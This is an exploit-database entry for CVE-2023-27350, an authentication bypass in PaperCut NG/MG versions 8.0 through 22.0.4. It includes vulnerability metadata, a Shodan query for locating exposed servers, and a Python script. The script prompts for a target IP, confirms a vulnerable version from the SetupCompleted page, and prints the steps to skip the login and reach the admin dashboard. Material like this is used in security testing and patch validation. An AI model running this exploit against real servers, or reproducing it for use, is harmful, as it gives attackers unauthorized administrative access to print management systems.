PaperCut NG/MG 22.0.4 - Authentication Bypass

vendor:

PaperCut NG/MG

by:

MaanVader

7.4

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: PaperCut NG/MG

Affected Version From: 8

Affected Version To: 22.0.4

Patch Exists: YES

Related CWE: CVE-2023-27350

CPE: a:papercut_software:papercut_ng/mg

Metasploit:

Other Scripts:

Tags: packetstorm,cve,cve2023,papercut,rce,oast,unauth,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/, https://nvd.nist.gov/vuln/detail/CVE-2023-27350, https://www.papercut.com/kb/Main/PO-1216-and-PO-1219, https://www.zerodayinitiative.com/advisories/ZDI-23-233/, http://packetstormsecurity.com/files/171982/PaperCut-MF-NG-Authentication-Bypass-Remote-Code-Execution.html

Nuclei Metadata: {'max-request': 10, 'shodan-query': 'http.html:"PaperCut"', 'verified': True, 'vendor': 'papercut', 'product': 'papercut_mf'}

Platforms Tested:

2023

PaperCut NG/MG 22.0.4 – Authentication Bypass

PaperCut NG/MG versions 8.0 and later are vulnerable to an authentication bypass vulnerability. By visiting the URL http://[IP]:9191/app?service=page/Dashboard, an attacker can bypass the login page and gain access to the application.

Mitigation:

Upgrade to the latest version of PaperCut NG/MG

Source

Exploit-DB raw data:

# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350

import requests
from bs4 import BeautifulSoup
import re

def vuln_version():
    ip = input("Enter the ip address: ")
    url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    text_div = soup.find('div', class_='text')
    product_span = text_div.find('span', class_='product')

    # Search for the first span element containing a version number
    version_span = None
    for span in text_div.find_all('span'):
        version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
        if version_match:
            version_span = span
            break

    if version_span is None:
        print('Not Vulnerable')
    else:
        version_str = version_span.text.strip()
        print('Version:', version_str)
        print("Vulnerable version")
        print(f"Step 1 visit this url first in your browser: {url}")
        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")


if __name__ =="__main__":
    vuln_version()